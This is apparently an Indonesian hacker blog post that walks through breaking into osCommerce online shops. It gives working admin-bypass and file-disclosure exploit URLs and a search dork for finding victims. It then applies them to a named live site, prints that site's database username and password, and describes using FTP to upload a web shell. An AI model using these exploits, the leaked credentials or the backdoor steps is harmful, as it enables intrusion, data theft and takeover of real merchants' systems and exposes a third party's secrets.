upload backdoor di osCommerce

ok, lasung aja ea, jalan2 ke sana sini, nemu exploit ttg osCommerce ya udah lah, lsg jajal eh akhirnya bisa juga… hehehehh, gini nie explot yg ada di site itu,

# ByPass Page Admin :

You can use this Trick if admin folder not protected by onestree code

if you Want to explore admin page without login. You can use /login.php behind the name of the file

Example :

http://[site]/admin/backup.php/login.php

or

http://[site]/admin/file_manager.php/login.php

Demo :

http://server/store/admin/file_manager.php/login.php

You can See all file in Directory Oscommerce.. haha ;)

and you can download all file with tRick above

# File Disclosure :

in : admin/file_manager.php/login.php?action=download&filename=

Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

ok, sekarang kita cari targetnya dgn dork “Powered by osCommerce” tanpa tanda titik ya :D

utk percobaan kita pake trget ini : http://osc22ms2-cyberoffice.1fonet.fr/catalog
nah, kita cari dulu nie admin page nya , jadinya http://osc22ms2-cyberoffice.1fonet.fr/catalog/admin/login.php nah, ketemu deh… :)

sekarang, kita pake exploitnya jadinya : http://osc22ms2-cyberoffice.1fonet.fr/catalog/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php nah kita mendapatkan configure.php, lsg aja deh kita download :D

selanjutnya, setelah kita download kita buka menggunakan notepad ato yg laen deh, nah itu tampak deh, kita coba dl masuk ke database tanpa masuk ke adminnya dgn yg kita dapatkan,

define(‘DB_SERVER_USERNAME’, ‘laurent’);
define(‘DB_SERVER_PASSWORD’, ‘UQzlZ0vrHEiu’);

habis kita dptkan yg kyk gitu, marilah kita buka melalui FTP, di sini saya menggunakan FileZila,
alhamdulillah sukses :genit: , marilah kita upload backdoor kita, biasanya sih di public_html, tp dsini saya upload di httpdocs, setelah success upload backdoor, lalu kita cek.
http://osc22ms2-cyberoffice.1fonet.fr/shell%20yg%20kita%20pasang, oke trnyata sudah terpasang, monggo silakan di lanjut pembantaiannya..

maaf ya klo agak ribet tulisannya, soalnya emg newbie jarang post


Originaly Hacked by: Upload backdoor di osCommerce
Under Creative Commons License: Attribution Non-Commercial

Tidak ada komentar: